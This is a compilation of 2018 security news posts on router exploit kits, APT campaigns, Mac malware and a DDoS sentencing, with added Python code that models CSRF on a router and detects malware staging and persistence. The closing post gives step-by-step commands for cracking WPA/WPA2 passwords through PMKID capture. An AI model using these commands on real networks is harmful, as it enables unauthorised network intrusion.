“An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.”

The vulnerability was reported to Microsoft by researchers at Kaspersky Lab. Kudos to the Kaspersky experts, who in recent months reported two other Windows zero-days, CVE-2018-8453 and CVE-2018-8589, exploited respectively by FruityArmor and by multiple threat actors in attacks mostly aimed at the Middle East.

According to Kaspersky, CVE-2018-8611 is a race condition in the Kernel Transaction Manager and, most interestingly, it could be used to escape the sandbox of the Chrome and Edge web browsers.

“CVE-2018-8611 is a race condition that is present in the Kernel Transaction Manager due to improper processing of transacted file operations in kernel mode.” reads the analysis published by Kaspersky.

“This vulnerability successfully bypasses modern process mitigation policies, such as Win32k System call Filtering that is used, among others, in the Microsoft Edge Sandbox and the Win32k Lockdown Policy employed in the Google Chrome Sandbox. Combined with a compromised renderer process, for example, this vulnerability can lead to a full Remote Command Execution exploit chain in the latest state-of-the-art web-browsers.”

Kaspersky has found several builds of the CVE-2018-8611 exploit, including one adapted for the latest versions of Windows.

The flaw was exploited by known threat actors and a recently discovered group tracked as SandCat that appears to be active in the Middle East.

SandCat was also using the FinFisher/FinSpy spyware and the CHAINSHOT malware.

According to Kaspersky, SandCat exploited the CVE-2018-8611 flaw in attacks aimed at entities in the Middle East and Africa. 

Pierluigi Paganini

(Security Affairs – SandCat, CVE-2018-8611)

The post New threat actor SandCat exploited recently patched CVE-2018-8611 0day appeared first on Security Affairs.

Novidade, a new Exploit Kit is targeting SOHO Routers

Security experts at Trend Micro have discovered a new exploit kit, dubbed Novidade (“novelty” in Portuguese), that is targeting SOHO routers to compromise the devices connected to the network equipment.

The Novidade exploit kit leverages cross-site request forgery (CSRF) to change the Domain Name System (DNS) settings of SOHO routers and redirect traffic from the connected devices to the IP address under the control of the attackers.

Since its first discovery in August 2017, experts observed three variants of the exploit kit, including one involved in the DNSChanger system of a recent GhostDNS campaign.

Novidade is currently used in several campaigns; experts believe it has been sold to multiple threat actors or that its source code has leaked.

Most of the campaigns discovered by the researchers leverage phishing attacks to retrieve banking credentials in Brazil. Experts also observed campaigns with no specific target geolocation, a circumstance that suggests the attackers are expanding their target areas or that a larger number of threat actors are using the exploit kit.

“We found Novidade being delivered through a variety of methods that include malvertising, compromised website injection, and via instant messengers.” reads the analysis published by Trend Micro.


Experts noticed that the landing page uses the JavaScript Image function to generate HTTP requests to a predefined list of local IP addresses commonly used by routers. Once a connection is established, Novidade queries the responding IP address to download a base64-encoded exploit payload.

The exploit kit blindly attacks the detected IP address with all its exploits. 

The malicious code also attempts to log into the router with a set of default credentials and then executes a CSRF attack to change the DNS settings.

“Once the router is compromised, all devices connected to it are vulnerable to additional pharming attacks.” continues the analysis.
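The CSRF step described above works because a router's settings page accepts a state change from any page the victim's browser happens to load. The model below is an added example, not code from Trend Micro or from any router vendor: a minimal "change DNS" endpoint in the weak form a kit like Novidade can drive, beside a hardened form that checks method, Origin/Referer and a per-session token. The router origin http://192.168.1.1, the request fields and the handler names are assumptions made for the example.

```python
"""Added example (not from the Trend Micro analysis): a SOHO router's
"change DNS" endpoint, modelled first as a CSRF-driveable handler and then
hardened. Origin, field names and handler names are assumptions."""
import hmac
import ipaddress
import secrets
from dataclasses import dataclass, field
from typing import Dict, Tuple

ROUTER_ORIGIN = "http://192.168.1.1"  # assumed LAN address of the router


@dataclass
class Request:
    """The parts of an HTTP request the handlers look at. A browser attaches
    the router's session cookie even when another site triggered the request,
    which is exactly what a CSRF attack relies on."""
    method: str
    headers: Dict[str, str]
    form: Dict[str, str]
    cookies: Dict[str, str] = field(default_factory=dict)


@dataclass
class RouterState:
    dns_servers: Tuple[str, ...] = ("192.168.1.1",)
    csrf_tokens: Dict[str, str] = field(default_factory=dict)  # session id -> token


def _valid_dns(form: Dict[str, str]) -> Tuple[str, ...]:
    """Accept only syntactically valid IP addresses; raise ValueError otherwise."""
    servers = tuple(form[k].strip() for k in ("dns1", "dns2") if form.get(k, "").strip())
    for server in servers:
        ipaddress.ip_address(server)
    return servers


def vulnerable_set_dns(state: RouterState, req: Request) -> bool:
    """Weak pattern: a logged-in session is the only check, so a hidden form on
    any web page the victim visits can rewrite the resolver list."""
    if "session" not in req.cookies:
        return False
    state.dns_servers = _valid_dns(req.form)
    return True


def issue_csrf_token(state: RouterState, session_id: str) -> str:
    """Called when the settings page is rendered for a logged-in session."""
    token = secrets.token_hex(16)
    state.csrf_tokens[session_id] = token
    return token


def hardened_set_dns(state: RouterState, req: Request) -> bool:
    """Same change, gated by method, Origin/Referer and a per-session token."""
    if req.method != "POST":  # state changes never happen on GET
        return False
    session = req.cookies.get("session")
    if session is None:
        return False
    # A browser sets Origin/Referer itself; a cross-site page cannot forge them.
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if origin != ROUTER_ORIGIN and not origin.startswith(ROUTER_ORIGIN + "/"):
        return False
    expected = state.csrf_tokens.get(session)
    supplied = req.form.get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected, supplied):
        return False
    state.dns_servers = _valid_dns(req.form)
    return True


def forged_request() -> Request:
    """Constructed: what a cross-site form submission looks like at the router.
    The resolver addresses are from the 203.0.113.0/24 documentation range."""
    return Request(
        method="POST",
        headers={"Origin": "http://attacker.invalid"},
        form={"dns1": "203.0.113.5", "dns2": "203.0.113.6"},
        cookies={"session": "abc123"},
    )


def legitimate_request(token: str) -> Request:
    """Constructed: the same change made from the router's own settings page."""
    return Request(
        method="POST",
        headers={"Origin": ROUTER_ORIGIN, "Referer": ROUTER_ORIGIN + "/dns.html"},
        form={"dns1": "9.9.9.9", "csrf_token": token},
        cookies={"session": "abc123"},
    )
```

The Origin check alone already stops the cross-site submission; the token is what still protects the endpoint when a browser omits Origin and Referer.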

All the variants of Novidade exploit kit observed by Trend Micro share the same attack chain, but the latest version improves the code on the landing page and adds a new method of retrieving the victim’s local IP address. 

Below is the list of possibly affected router models, based on Trend Micro's comparison of the malicious code, network traffic, and published PoC code.

  • A-Link WL54AP3 / WL54AP2 (CVE-2008-6823)
  • D-Link DSL-2740R
  • D-Link DIR 905L
  • Medialink MWN-WAPR300 (CVE-2015-5996)
  • Motorola SBG6580
  • Realtron
  • Roteador GWR-120
  • Secutech RiS-11/RiS-22/RiS-33 (CVE-2018-10080)
  • TP-Link TL-WR340G / TL-WR340GD
  • TP-Link WR1043ND V1 (CVE-2013-2645)

Novidade was used mostly to target Brazilian users; the largest campaign has delivered the exploit kit 24 million times since March.

In September and October, Novidade was delivered through instant messenger notifications about the 2018 Brazil presidential election, and through compromised websites injected with an iframe that redirected users to Novidade. The latter attack hit websites worldwide.

Trend Micro recommends keeping device firmware up to date, changing the default usernames and passwords on routers, and changing the router's default IP address. Disabling remote access, if it is not needed, is also recommended, as is using secure web connections (HTTPS) to access sensitive websites in order to prevent pharming attacks.

Pierluigi Paganini

(Security Affairs – Novidade exploit kit, hacking)

The post Novidade, a new Exploit Kit is targeting SOHO Routers appeared first on Security Affairs.

Security Affairs: Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries

Group-IB, an international company that specializes in preventing cyberattacks, has detected more than 40 000 compromised user credentials of online government services in 30 countries around the world.

Most of the victims were in Italy (52%), Saudi Arabia (22%) and Portugal (5%). Users’ data might have been sold on underground hacker forums or used in targeted attacks to steal money or exfiltrate sensitive information. CERT-GIB (Group-IB’s Computer Emergency Response Team) upon identification of this information promptly warned CERTs of the affected countries about the threat so that risks could be mitigated.

Group-IB Threat Intelligence has detected government websites’ user accounts compromised by cyber criminals in 30 countries. Official government portals including Poland (gov.pl), Romania (gov.ro), Switzerland (admin.ch), the websites of the Italian Ministry of Defense (difesa.it), the Israel Defense Forces (idf.il), the Government of Bulgaria (government.bg), the Ministry of Finance of Georgia (mof.ge), the Norwegian Directorate of Immigration (udi.no), the Ministries of Foreign Affairs of Romania and Italy and many other government agencies were affected by the data compromise.

Government employees, military and civilian citizens who had accounts on official government portals of France (gouv.fr), Hungary (gov.hu) and Croatia (gov.hr) became victims of this data compromise. In total, the Group-IB Threat Intelligence system has detected more than 40 000 compromised user accounts of the largest government websites in 30 countries across the world over the past year and a half – Italy (52%), Saudi Arabia (22%) and Portugal (5%) were affected most.

According to Group-IB experts, cyber criminals stole user accounts’ data using special spyware – form grabbers and keyloggers such as Pony Formgrabber, AZORult and Qbot (Qakbot). Phishing emails were sent to personal and corporate email accounts. The infection came from malware included as an email attachment disguised as a legitimate file or archive. Once opened, it ran a Trojan aimed at stealing personal information. For instance, Pony Formgrabber retrieves login credentials from the configuration files, databases and secret storage of more than 70 programs on the victim’s computer and then sends the stolen information to the cyber criminals’ C&C server. Another Trojan-stealer, AZORult, aside from stealing passwords from popular browsers, is capable of stealing crypto wallet data. The Qbot worm gathers login credentials through the use of a keylogger, steals cookie files, certificates and active internet sessions, and forwards users to fake websites.

The stolen user accounts data is usually sorted by subject (banks’ client data, government portals user accounts, combo lists – email & password) and goes for sale on underground hacker forums. It is worth noting that government websites’ user accounts are less common on the forums. Cyber criminals and state-sponsored APT-groups, specialized in sabotage and espionage, are among those who can buy this information. Knowing the credentials of government websites’ users, hackers can not only obtain classified information from these websites, but also infiltrate government networks. Even one compromised government employee’s account can lead to the theft of commercial or state secrets.

“The scale and simplicity of government employees’ data compromise shows that users, due to their carelessness and lack of reliable cyber defense, fall victims to hackers,” commented Alexandr Kalinin, head of Group-IB’s Computer Emergency Response Team (CERT-GIB). “Malware used by cyber criminals to compromise user accounts continue to evolve. For better protection against this type of attacks, it is indeed important to not only use most up-to-date anti-APT solutions, but also to know the context of the attacks: when, where and how exactly your data was compromised”.

The regularly updated Group-IB Threat Intelligence system provides actionable information about data leaks, compromised accounts, malware, infected IPs and existing vulnerabilities across the world. These indicators make it possible to prepare for cyberattacks in advance. Another important factor is international cooperation. To prevent further incidents, CERT-GIB experts contacted official CERTs in more than 30 countries and notified local incident response teams about the data compromise.

“Threat Intelligence data exchange between official government CERTs is crucial for global fight against cybercrime,” highlights Alexandr Kalinin, “it is important for us to cooperate with other CERTs, which allows to provide rapid incident response and gather more information about hackers’ evolving tactics and tools, indicators of compromise, and about most urgent threats. Cybercrime has no borders and affects private and public companies and ordinary citizens. International data exchange on current threats is a backbone of global stability”.

About the author: Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. 

Pierluigi Paganini

(Security Affairs – leaked credentials, cybercrime)

The post Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries appeared first on Security Affairs.

Hackers Defaced Linux.org As Protest Against Linux Code of Conduct

Just recently, Linux.org owners had to bear with a seriously embarrassing situation when they noticed someone meddling with their website.

Hackers Defaced Linux.org As Protest Against Linux Code of Conduct on Latest Hacking News.

Security Affairs: Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept

The Seedworm APT Group has targeted more than 130 victims in 30 organizations since September including NGOs, oil and gas, and telecom businesses.

According to new research conducted by Symantec’s DeepSight Managed Adversary and Threat Intelligence (MATI) team, the Seedworm APT group, aka MuddyWater, is rapidly evolving and has extended its targets to the telecom, IT services, and oil and gas industries.

The first MuddyWater campaign was observed in late 2017, when researchers from Palo Alto Networks were investigating a mysterious wave of attacks in the Middle East.

The experts called the campaign ‘MuddyWater’ because of the confusion in attributing these attacks, which took place between February and October 2017 and targeted entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States.

In September 2018, experts from Symantec found evidence of Seedworm and the espionage group APT28 on a computer in the Brazil-based embassy of an oil-producing nation. 

“We not only found the initial entry point, but we were able to follow Seedworm’s subsequent activity after the initial infection due to the vast telemetry Symantec has access to via its Global Intelligence Network. Because of this unique visibility, our analysts were able to trace what actions Seedworm took after they got into a network.”

“Seeing two active groups piqued our interest and, as we began pulling on that one string, we found more clues that led us to uncover new information about Seedworm.” reads the analysis published by Symantec.

The experts were able to gather further information on the group: of the 131 victims hit from mid-September to late November 2018, 39% were in Pakistan, 14% in Turkey, 8% in Russia, and 5% in Saudi Arabia.

Most of the targets were in the telecommunications and IT services sectors.


Experts believe that the Seedworm APT is focused on telecommunications and IT services because it is interested in gaining access to the customers of those firms.

Changing Tools and Techniques

Seedworm threat actors regularly adopt new tactics, techniques and tools to remain under the radar. 

In recent campaigns, the cyber espionage group used new variants of its Powermud backdoor, a new backdoor (Powermuddy), and custom tools designed to steal passwords, create reverse shells, escalate privileges, and make use of the native Windows cabinet creation tool.

“We found new variants of the Powermud backdoor, a new backdoor (Backdoor.Powemuddy), and custom tools for stealing passwords, creating reverse shells, privilege escalation, and the use of the native Windows cabinet creation tool, makecab.exe, probably for compressing stolen data to be uploaded.” continues the analysis.

“The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control (C&C) location.”
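The makecab.exe detail above is the kind of living-off-the-land activity that process-creation telemetry can catch. The rule below is an added example, not from the Symantec report: it scores makecab.exe launches over constructed Sysmon-style (Event ID 1) JSON lines, raising the score when a script host such as powershell.exe is the parent, when the command line points at user-writable directories, and when no .ddf directive file is involved. The parent list, the scoring, the threshold and the sample events are assumptions made for the example.

```python
"""Added example (not from the Symantec report): score makecab.exe process
creations for the stolen-data staging pattern. Parent list, scoring and
sample events are assumptions of the example."""
import json
from typing import Dict, List

# Script hosts from which legitimate packaging tooling rarely launches makecab.exe.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Directories a staging step for collected files is likely to use.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
ALERT_THRESHOLD = 2


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_makecab_event(event: Dict[str, object]) -> Dict[str, object]:
    """Return a score and the reasons; score 0 for anything that is not makecab.exe."""
    reasons: List[str] = []
    score = 0
    if image_name(str(event.get("Image", ""))) != "makecab.exe":
        return {"score": 0, "reasons": reasons}
    parent = image_name(str(event.get("ParentImage", "")))
    cmd = str(event.get("CommandLine", "")).lower()
    if parent in SCRIPT_HOSTS:
        score += 2
        reasons.append(f"spawned by script host {parent}")
    if any(d in cmd for d in USER_WRITABLE):
        score += 1
        reasons.append("command line references user-writable directories")
    if "/f" not in cmd and ".ddf" not in cmd:
        # Legitimate packaging normally goes through a directive (.ddf) file;
        # a bare "makecab.exe <file> <out.cab>" compresses a single file.
        score += 1
        reasons.append("single-file cab without a .ddf directive")
    return {"score": score, "reasons": reasons}


def scan_events(lines: List[str]) -> List[Dict[str, object]]:
    """Run the rule over JSON lines; malformed lines are skipped, not fatal."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        verdict = score_makecab_event(event)
        if verdict["score"] >= ALERT_THRESHOLD:
            hits.append({"ProcessId": event.get("ProcessId"),
                         "User": event.get("User"), **verdict})
    return hits


# Constructed sample events; users, paths and PIDs are invented, not real IoCs.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 1, "ProcessId": 4120, "User": "CORP\\jdoe",
                "Image": "C:\\Windows\\System32\\makecab.exe",
                "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "CommandLine": "makecab.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\docs.txt "
                               "C:\\Users\\jdoe\\AppData\\Local\\Temp\\out.cab"}),
    json.dumps({"EventID": 1, "ProcessId": 5588, "User": "CORP\\build",
                "Image": "C:\\Windows\\System32\\makecab.exe",
                "ParentImage": "C:\\Program Files\\Build\\msbuild.exe",
                "CommandLine": "makecab.exe /F C:\\build\\package.ddf"}),
    json.dumps({"EventID": 1, "ProcessId": 6010, "User": "CORP\\jdoe",
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "ParentImage": "C:\\Windows\\explorer.exe",
                "CommandLine": "powershell.exe -File C:\\Users\\jdoe\\script.ps1"}),
    "not json at all",
]
```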

Once a machine is compromised with its backdoors, the threat actors deploy a tool to steal passwords saved in browsers and credentials for email accounts, social media, and chat.

The attackers are very agile; they also use publicly available tools to quickly update their operations.

Unlike other APT groups that adopt custom malware for each campaign, the Seedworm threat actors are more focused on the ability to quickly adapt their actions to specific circumstances.

According to Symantec, there is evidence of Seedworm following the people who are analyzing their activities.

Further details, including IoCs, are reported in the report published by Symantec.

Pierluigi Paganini

(Security Affairs – Seedworm, APT)

The post Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept appeared first on Security Affairs.

Google will shut down consumer version of Google+ earlier due to a bug

Google announced it will close the consumer version of Google+ earlier than originally planned due to the discovery of a new security flaw.

Google will close the consumer version of Google+ in April, four months earlier than planned. According to G Suite product management vice president David Thacker, the company will maintain only a version designed for businesses. Google will shut down the application programming interfaces (APIs) used by developers to access Google+ data within 90 days, due to the discovery of a bug.

“We’ve recently determined that some users were impacted by a software update introduced in November that contained a bug affecting a Google+ API.” wrote David Thacker.

“We discovered this bug as part of our standard and ongoing testing procedures and fixed it within a week of it being introduced. No third party compromised our systems, and we have no evidence that the app developers that inadvertently had this access for six days were aware of it or misused it in any way.”

The new flaw was introduced with a software update in November and it was discovered during routine testing and quickly fixed by the experts of the company.

Thacker pointed out that the protection of Google users is a priority for the firm, and for this reason all Google+ APIs will be shut down soon.

“With the discovery of this new bug, we have decided to expedite the shut-down of all Google+ APIs,” Thacker said.

“While we recognize there are implications for developers, we want to ensure the protection of our users.”


According to Google, the vulnerability affected approximately 52.5 million users, allowing applications to see profile information such as name, occupation, age, and email address even if access was set to private.

Google initially announced plans to shut down Google+ after discovering a bug that exposed private data in as many as 500,000 accounts.

At the time, there was no evidence that developers had taken advantage of the flaw.

Google is in the process of notifying any enterprise customers that were impacted by this flaw.

“A list of impacted users in those domains is being sent to system administrators, and we will reach out again if any additional impacted users or issues are discovered.” concludes Thacker. 

Pierluigi Paganini

(Security Affairs – Google+, social network)

The post Google will shut down consumer version of Google+ earlier due to a bug appeared first on Security Affairs.

A new Mac malware combines a backdoor and a crypto-miner

Experts from Malwarebytes discovered a new strain of Mac malware, tracked as DarthMiner, that is a combination of two open-source programs. 

Experts from Malwarebytes discovered a new piece of Mac malware, tracked as DarthMiner, that is the combination of two open source tools.

The malware is distributed through Adobe Zii, an application that supposedly helps pirate various Adobe programs. In this case, the attackers used a fake Adobe Zii application that was definitely not the real thing.

“Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—the EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.” reads the analysis published by MalwareBytes.

“The malware was being distributed through an application named Adobe Zii.”

The fake Adobe Zii application was developed to run a shell script that downloads and executes a Python script, and then downloads and runs an app named sample.app, which appears to be a version of Adobe Zii, most likely so that the whole package looks harmless.

The Python script looks for the presence of Little Snitch, a commonly used outgoing firewall, and halts the infection process if it is present.

The script then opens a connection to an EmPyre backend that can send arbitrary commands to the compromised Mac. Next, the backdoor downloads a script that fetches and installs the other components of the malware. The malware creates a launch agent named com.proxy.initialize.plist that keeps the backdoor open persistently by running exactly the same obfuscated Python script mentioned previously.

The malicious code also installs the XMRig cryptominer and creates a launch agent for it. 
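The launch agent is the durable part of this infection: a plist in a LaunchAgents folder whose ProgramArguments run an inline, obfuscated Python one-liner at every login. The scanner below is an added example, not code from the Malwarebytes write-up: it parses launchd property lists with plistlib and flags agents that run an interpreter with -c, whose arguments contain decoding or exec primitives, or whose label matches the com.proxy.initialize name from the analysis. The two sample plists and the benign label are constructed for the example; the interpreter list and regex are assumptions.

```python
"""Added example (not from the Malwarebytes analysis): flag launchd agents that
persist an inline, obfuscated interpreter script. Only the label
com.proxy.initialize comes from the analysis; everything else is constructed."""
import plistlib
import re
from typing import Dict, List

KNOWN_BAD_LABELS = {"com.proxy.initialize"}  # label reported by Malwarebytes
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "zsh", "perl", "osascript"}
# Primitives an inline loader needs to unpack and run its real payload.
OBFUSCATION = re.compile(r"base64|b64decode|exec\(|eval\(|zlib|\\x[0-9a-f]{2}", re.I)


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1].lower()


def inspect_launch_agent(plist_bytes: bytes) -> Dict[str, object]:
    """Return the label, a verdict and the reasons for one launchd plist."""
    plist = plistlib.loads(plist_bytes)
    label = str(plist.get("Label", ""))
    args = plist.get("ProgramArguments")
    if not args and "Program" in plist:
        args = [plist["Program"]]
    args = [str(a) for a in (args or [])]
    reasons: List[str] = []
    if label in KNOWN_BAD_LABELS:
        reasons.append(f"label matches known IoC: {label}")
    if args and basename(args[0]) in INTERPRETERS:
        if "-c" in args[1:]:
            reasons.append("interpreter runs inline code (-c)")
        if any(OBFUSCATION.search(a) for a in args[1:]):
            reasons.append("arguments contain decoding/exec primitives")
    if reasons and plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("persistent: RunAtLoad and KeepAlive are set")
    return {"label": label, "suspicious": bool(reasons), "reasons": reasons}


def scan_plists(plists: List[bytes]) -> List[Dict[str, object]]:
    """Inspect each plist (e.g. every file under ~/Library/LaunchAgents)."""
    return [r for r in (inspect_launch_agent(p) for p in plists) if r["suspicious"]]


# Constructed plist resembling the persistence described in the analysis; the
# base64 string decodes to the harmless text "import os".
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.proxy.initialize</string>
  <key>ProgramArguments</key><array>
    <string>/usr/bin/python</string>
    <string>-c</string>
    <string>import base64,sys;exec(base64.b64decode('aW1wb3J0IG9z'))</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

# Constructed benign agent: a compiled binary with plain arguments.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Example.app/Contents/MacOS/updater</string>
    <string>--check</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""
```

The interpreter-with-inline-code rule is what catches a renamed copy of the agent; the label match only catches this exact sample.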

The analysis of the code revealed another interesting feature, the code to download and install a root certificate for the mitmproxy tool.

“Interestingly, there’s code in that script to download and install a root certificate associated with the mitmproxy software, which is software capable of intercepting all web traffic, including (with the aid of the certificate) encrypted “https” traffic. However, that code was commented out, indicating it was not active.” continues the analysis.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis.

“Please, in the future, do yourself a favor and don’t pirate software. The costs can be far higher than purchasing the software you’re trying to get for free,” Malwarebytes concludes.

Pierluigi Paganini

(Security Affairs – Mac malware, backdoor)

The post A new Mac malware combines a backdoor and a crypto-miner appeared first on Security Affairs.


Toyota’s PASTA- A car hacking tool to enhance automobile cybersecurity

By Waqas

A team of security researchers working for the renowned automobile maker Toyota have developed a new car hacking tool. Dubbed as PASTA (Portable Automotive Security Testbed), it is an open source tool created to help researchers identify the prevailing vulnerabilities in modern vehicles. The team presented their research at the BLACKHAT EUROPE 2018, London, where […]

This is a post from HackRead.com Read the original post: Toyota’s PASTA- A car hacking tool to enhance automobile cybersecurity

How To Tell If Your Smartphone Has Been Hacked

Your home screen is just a matrix of numbers. Your device loses its charge quickly, or restarts suddenly. Or, you notice outgoing calls that you never dialed. Chances are your smartphone has been hacked. The sad truth is that hackers now have a multitude of ways to get into your phone, without ever touching it.

Given that our smartphones have become our new wallets, containing a treasure trove of personal and financial information, a breach can leave you at serious risk.

The intruder could log in to your accounts as you, spam your contacts with phishing attacks, or rack up expensive long-distance charges. They could also access any passwords saved on your phone, potentially opening the door to sensitive financial accounts. That’s why it’s important to be able to recognize when your smartphone has been hacked, especially since some of the signs can be subtle.

Here are some helpful clues:

Performance Differences

Is your device operating slower, are web pages and apps harder to load, or does your battery never seem to keep a charge? What about your data plan? Are you exceeding your normal limits? These are all signs that you have malware running in the background, zapping your phone’s resources.

You may have downloaded a bad app, or clicked on a dangerous link in a text message. And malware, like Bitcoin miners, can strain computing power, sometimes causing the phone to heat up, even when you aren’t using it.

Mystery Apps or Data

If you find apps you haven’t downloaded, or calls, texts, and emails that you didn’t send, a hacker is probably in your system. They may be using your device to make premium-rate calls or send premium-rate messages, or to spread malware to your contacts.

Pop-ups or Strange Screen Savers

Malware can also be behind spammy pop-ups, changes to your home screen, or bookmarks to suspicious websites. In fact, if you see any configuration changes you didn’t personally make, this is another big clue that your smartphone has been hacked.

What To Do

If any of these scenarios sound familiar, it’s time to take action. Start by deleting any apps or games you didn’t download, erasing risky messages, and running mobile security software, if you have it. Warn your contacts that your phone has been compromised, and to ignore any suspicious links or messages coming from you.

If the problem still doesn’t go away, consider restoring your phone to its original settings. Search online for instructions for your particular phone and operating system to learn how.

Now, let’s look at how to avoid getting hacked in the first place.

Secure Smartphone Tips

1. Use mobile security software—These days your smartphone is just as data rich as your computer. Make sure to protect your critical information, and your privacy, by using comprehensive mobile security software that not only protects you from online threats, but offers anti-theft and privacy protection.

2. Lock your device & don’t store passwords—Make sure that you are using a passcode or facial ID to lock your device when you’re not using it. This way, if you lose your phone it will be more difficult for a stranger to access your information.

Also, remember not to save passwords or login information for banking apps and other sensitive accounts. You don’t want a hacker to be able to log in as you automatically if they do gain access to your device.

3. Avoid using public Wi-Fi—Free Wi-Fi networks, like those offered in hotels and airports, are often unsecured. This makes it easy for a hacker to potentially see the information you are sending over the network. Also, be wary of using public charging stations, unless you choose a “charging only” cable that cannot access your data.

4. Never leave your device unattended in public—While many threats exist online, you still have to be aware of real-world threats, like someone grabbing your device when you’re not looking. Keep your smartphone on you, or within view, while in public.

If you have a “phone visibility” option, turn it off. This setting allows nearby devices to see your phone and exchange data with it.

5. Stay aware—New mobile threats are emerging all the time. Keep up on the latest scams and warning signs, so you know what to look out for.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Tell If Your Smartphone Has Been Hacked appeared first on McAfee Blogs.


Security Affairs: Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS

The British teenager George Duke-Cohan (19) has been sentenced to three years in prison for making false bomb threats and carrying out DDoS attacks.

Duke-Cohan, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” was arrested on August 31 by the U.K. National Crime Agency (NCA) and pleaded guilty to three counts of making hoax bomb threats.

According to investigators, the young man is the leader of the Apophis Squad, the hacking group that sent bomb threats to thousands of schools in the United Kingdom and the United States.

The group is also known for launching massive DDoS attacks against encrypted email provider ProtonMail, the popular investigator Brian Krebs, the DEF CON hacking conference, and government agencies worldwide.

The team was offering a DDoS-for-hire service that has many similarities with the booter implemented by the popular Lizard Squad hacking crew.

He has admitted making bomb threats to thousands of schools and to a United Airlines flight traveling from the UK to San Francisco in August, in many cases resulting in evacuations. The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

Cohan has now been sentenced to one year in prison for the bomb hoaxes targeting schools, and two years for the airport attack.

Unfortunately for the British youngster, he will also face charges in the United States, though the indictment has yet to be announced.

Before sentencing, the judge noted that Duke-Cohan’s early guilty pleas, his age, no prior criminal record and, to a limited extent, his “functioning deficiencies which have contributed to a diagnosis of autism,” were taken into consideration. However, these mitigating factors only helped his case to a certain degree.

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow,” Judge Richard Foster said, quoted by the Daily Mail.

“You were playing a cat-and-mouse game with the authorities. You were playing a game for your own perverted sense of fun in full knowledge of the consequences.”

“What you did was far removed from anything that could be described as naivety or a cry for help from a sick person.”

Pierluigi Paganini

(Security Affairs – cybercrime, DDoS)

The post Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS appeared first on Security Affairs.




Security Affairs: Expert devised a new WiFi hack that works on WPA/WPA2

The popular expert Jens ‘Atom’ Steube devised a new WiFi hack that allows cracking WiFi passwords of most modern routers.

Jens ‘Atom’ Steube, the lead developer of the popular password-cracking tool Hashcat, has developed a new WiFi hacking technique that allows cracking WiFi passwords of most modern routers.


The attack technique works against WPA/WPA2 wireless network protocols with Pairwise Master Key Identifier (PMKID)-based roaming features enabled.

Steube discovered the attack while he was analyzing the WPA3 security standard.

The technique allows an attacker to recover the Pre-shared Key (PSK) login passwords and use them to hack into your Wi-Fi network and eavesdrop on the Internet traffic.


Unlike other WiFi hacking techniques, this attack doesn’t require the capture of a full 4-way authentication handshake of EAPOL.

Instead, the new WiFi hack is performed on the RSN IE (Robust Security Network Information Element) using a single EAPOL (Extensible Authentication Protocol over LAN) frame after requesting it from the access point.

“This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).”

“The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame”

The Robust Security Network protocol allows establishing secure communications over an 802.11 wireless network. It uses the PMKID key to establish a connection between a client and an access point.

Below is the attack, step by step:

Step 1 — Run hcxdumptool to request the PMKID from the Access Point and to dump the received frame to a file (in pcapng format).

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

Step 2 — Run hcxpcaptool tool to convert the captured data from pcapng format to a hash format that is accepted by Hashcat.

$ ./hcxpcaptool -z test.16800 test.pcapng

Step 3 — Launch the Hashcat (v4.2.0 or higher) password cracking tool and crack it. The hash-mode that we need to use is 16800.

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

In this way it is possible to retrieve the password of the target WiFi network.

